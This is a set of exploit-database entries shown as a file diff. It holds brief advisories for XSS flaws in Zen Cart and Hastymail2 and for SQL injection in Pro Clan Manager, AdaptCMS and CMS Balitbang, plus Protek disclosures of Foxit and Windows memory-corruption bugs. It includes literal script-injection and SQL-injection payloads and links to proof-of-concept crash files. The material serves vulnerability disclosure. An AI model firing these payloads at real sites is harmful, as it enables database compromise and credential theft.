platforms/php/webapps/36346.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/50787/info
Zen Cart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Zen Cart 1.3.9h is vulnerable; other versions may also be affected.
GET: https://www.example.com/index.php?main_page=gv_send&action=send
POST: message=&lt;/textarea&gt;<script>alert("XSS");</script><textarea>
line 72: echo &#039;<br /><strong>TESTING INFO:</strong> Time page: <strong>&#039; . $_GET[&#039;main_page&#039;] . &#039;</strong> was loaded is: <strong>&#039; . date(&#039;H:i:s&#039;, time()) . &#039;</strong><br /><br />&#039;;
...
line 75: echo "GLOBALS[$main_page] and HTTP_GET_VARS[&#039;main_page&#039;] and _GET[&#039;main_page&#039;] = " . $GLOBALS[&#039;main_page&#039;] . &#039; - &#039; . $HTTP_GET_VARS[&#039;main_page&#039;] . &#039; - &#039; . $_GET[&#039;main_page&#039;] . &#039;<br /><br />&#039;;
...
line 76: echo "_SERVER[&#039;PHP_SELF&#039;] and _GET[&#039;PHP_SELF&#039;] and PHP_SELF and _SESSION[&#039;PHP_SELF&#039;] = " . $_SERVER[&#039;PHP_SELF&#039;] . &#039; - &#039; . $_GET[&#039;PHP_SELF&#039;] . &#039; - &#039; . $PHP_SELF . &#039; - &#039; . $_SESSION[&#039;PHP_SELF&#039;] . &#039;<br /><br />&#039;;

10
platforms/php/webapps/36347.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50789/info
Hastymail2 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Hastymail2 2.1.1 is vulnerable; other versions may also be affected.
GET: http://<app_base>/index.php?page=mailbox&mailbox=Drafts
POST: rs=<script>alert(&#039;xss&#039;)</script>

9
platforms/php/webapps/36348.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50794/info
Pro Clan Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pro Clan Manager 0.4.2 is vulnerable; other versions may also be affected.
notarealuser%00'+union+select+1;#

12
platforms/php/webapps/36349.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/50795/info
AdaptCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.0 and 2.0.1 are vulnerable; other versions may also be affected.
http://www.example.com/article/'66/Blog/AdaptCMS-20-March-26th
http://www.example.com/article/'75/News/AdaptCMS-200-Released
http://www.example.com/article/'293/Album/Pink-Floyd-Animals
http://www.example.com/article/'294/News/AdaptCMS-202-Update

7
platforms/php/webapps/36350.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50797/info
CMS Balitbang is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/<CMS Balitbang Installation Path>/index.php?id=lih_buku&hal='[SQL]

7
platforms/php/webapps/36351.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50797/info
CMS Balitbang is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/<CMS Balitbang Installation Path>/alumni.php?id=data&tahun&hal='[SQL]

69
platforms/windows/dos/36334.txt Executable file
View file

@ -0,0 +1,69 @@
#####################################################################################
Application: Foxit Products GIF Conversion Memory Corruption Vulnerabilities (LZWMinimumCodeSize)
Platforms: Windows
Versions: The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected.
Secunia: SA63346
{PRL}: 2015-01
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
(http://en.wikipedia.org/wiki/Foxit_Reader)
#####################################################################################
============================
2) Report Timeline
============================
2015-02-17: Francis Provencher from Protek Research Labs found the issue;
2015-02-21: Foxit Security Response Team confirmed the issue;
2015-02-21: Foxit fixed the issue;
2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1.
#####################################################################################
============================
3) Technical details
============================
An error when handling LZWMinimumCodeSize can be exploited to cause memory corruption via a specially crafted GIF file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-01.gif
http://www.exploit-db.com/sploits/36334.gif
###############################################################################

68
platforms/windows/dos/36335.txt Executable file
View file

@ -0,0 +1,68 @@
#####################################################################################
Application: Foxit Products GIF Conversion Memory Corruption Vulnerabilities (DataSubBlock)
Platforms: Windows
Versions: The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected.
Secunia: SA63346
{PRL}: 2015-02
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
(http://en.wikipedia.org/wiki/Foxit_Reader)
#####################################################################################
============================
2) Report Timeline
============================
2015-01-22: Francis Provencher from Protek Research Labs found the issue;
2015-01-28: Foxit Security Response Team confirmed the issue;
2015-01-28: Foxit fixed the issue;
2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1.
#####################################################################################
============================
3) Technical details
============================
An error when handling the Size member of a GIF DataSubBlock data structure can be exploited to cause memory corruption via a specially crafted GIF file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-02.gif
http://www.exploit-db.com/sploits/36335.gif
###############################################################################

73
platforms/windows/dos/36336.txt Executable file
View file

@ -0,0 +1,73 @@
#####################################################################################
Application: Microsoft Windows Text Services memory corruption.
Platforms: Windows
Versions: list.
Microsoft: MS15-020
Secunia: SA63220
{PRL}: 2015-03
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Microsoft Corporation is an American multinational corporation headquartered in Redmond, Washington, that develops, manufactures, licenses, supports and sells computer software, consumer electronics and personal computers and services. Its best known software products are the Microsoft Windowsline of operating systems, Microsoft Office office suite, and Internet Explorer web browser. Its flagship hardware products are the Xbox game consoles and the Microsoft Surface tablet lineup. It is the worlds largest software maker measured by revenues.[5]It is also one of the worlds most valuable companies.[6]
(http://en.wikipedia.org/wiki/Microsoft)
#####################################################################################
============================
2) Report Timeline
============================
2015-02-08: Francis Provencher from Protek Research Labs found the issue;
2015-03-04: MSRC confirmed the issue;
2015-03-10: Microsoft fixed the issue;
2015-03-10: Microsoft release a Patch for this issue.
#####################################################################################
============================
3) Technical details
============================
An unspecified error in Windows Text Services can be exploited to cause memory corruption..
#####################################################################################
===========
4) POC
===========
This file need to be open in wordpad.
http://protekresearchlab.com/exploits/PRL-2015-03.rar
http://www.exploit-db.com/sploits/36336.rar
###############################################################################
Search for: